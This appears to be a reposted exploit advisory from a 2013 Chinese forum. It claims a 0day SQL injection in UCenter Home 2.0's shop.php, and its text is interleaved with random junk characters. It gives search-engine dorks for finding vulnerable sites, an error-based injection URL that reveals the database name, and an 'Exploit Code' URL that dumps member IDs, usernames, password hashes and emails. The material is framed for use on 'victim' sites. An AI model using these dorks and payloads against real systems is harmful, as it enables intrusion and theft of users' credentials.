, j9 n5 A+ {6 \% ]( O& ~& T! e5 P# C__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
) ?6 @, X1 j6 K) c0 ]6 D
5 t1 o" ]* X" Q1 w/ U7 A; C
9 I" B, z0 H5 ]8 A- w/ f. c3 u& G" {: d; |, M* d- ~- ^' T7 k
*/ Author : KnocKout
. A# e' A( m' f8 N: E
5 r" K' P. C& }, n6 @% p*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 8 E' ~& U2 [7 {$ z. ]
9 {. }) ~ z* q& v1 Y2 M. D*/ Contact: knockoutr@msn.com
# Z6 j0 ]& d' c5 {+ h" ?% q" P! @+ K5 C7 q! F3 X
*/ Cyber-Warrior.org/CWKnocKout 3 y. k) h: L* C
5 ?$ } o7 H- ?$ Y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ! W8 D$ V, R# r$ G. f2 A4 \% r
6 F; K% {7 H6 F( w- z) u4 M& w+ KScript : UCenter Home $ @0 ?$ X4 o. m) _4 n, W( a9 F( b5 ?
7 D' W+ [9 b: k5 |. ?
Version : 2.0 # x" m* ]" q5 ~7 a
8 Z( c5 L$ D# i- s, jScript HomePage : http://u.discuz.net/
( B0 f0 o$ _. x3 Q
0 Q3 G, a+ T3 w5 O- M: G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
5 i- y$ h) w' j# b' {$ d' X
. s# }# U$ H) w7 L0 T7 E2 qDork : Powered by UCenter inurl:shop.php?ac=view " Q) }6 {4 V7 N q4 m
1 u6 f, b6 P& S- f* QDork 2 : inurl:shop.php?ac=view&shopid= 7 _3 z4 N' n6 q/ w7 R
3 Q$ g' G7 [8 y9 N% ?# w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; D# f# n3 u5 B) F; w5 F) G' ?
% u5 Q4 ]+ r( h* H$ @! h1 y6 s7 cVuln file : Shop.php # O, w9 z2 ^$ i' e# ]
5 P8 j! Z: @& g9 k) t) Zvalue's : (?)ac=view&shopid= 8 _5 o. E/ u: c' I; X
$ K5 F5 I( N5 s) H
Vulnerable Style : SQL Injection (MySQL Error Based)
# u0 a5 E5 k' y' u2 W
+ v" e" Z$ } O- ?3 G0 _Need Metarials : Hex Conversion 1 b! H( N! w+ a. ?0 e7 `+ z
+ G1 D* x$ n0 M$ ^) V- O
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- |, ?" X2 O* E+ {; A9 n( r9 y% B7 @- k& k4 Z, A
Your Need victim Database name. ' `( ?, I' d! |- u3 w2 n }2 @" m
2 O% t9 e& x& M8 ffor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! @- D" R3 b4 f& E, m$ |" R
' H# K0 [1 y0 b3 q' T
..
! |' `7 d1 \+ V9 V' f
! n1 r' @3 `; h. K- ~( X# sDB : Okey. . m3 ~# V& K h; G' f+ J
( _' i8 n& y( F" d6 q# Z' O& Cyour edit DB `[TARGET DB NAME]` ! `0 Q: f5 y6 V) R1 j! X) A7 X- c& B
! j7 ^' n% }$ L8 T
Example : 'hiwir1_ucenter' ' Q% R( A7 N5 k
: ~4 t3 u. U6 p# MEdit : Okey. ( }* d7 K; j3 Z
: @+ F# ]9 S+ l6 A
Your use Hex conversion. And edit Your SQL Injection Exploit..
* \4 s Z# X2 X1 I# i
8 t. h8 m9 _. v7 Y: d2 q# u( A
# o# A* B+ S: h2 N, X* U
: Q! B9 i7 Y! y. x; K' R6 AExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* f; h, c7 k4 K# v& Q: r |
发表于 2013-2-27 21:31:31
收藏
分享
支持
反对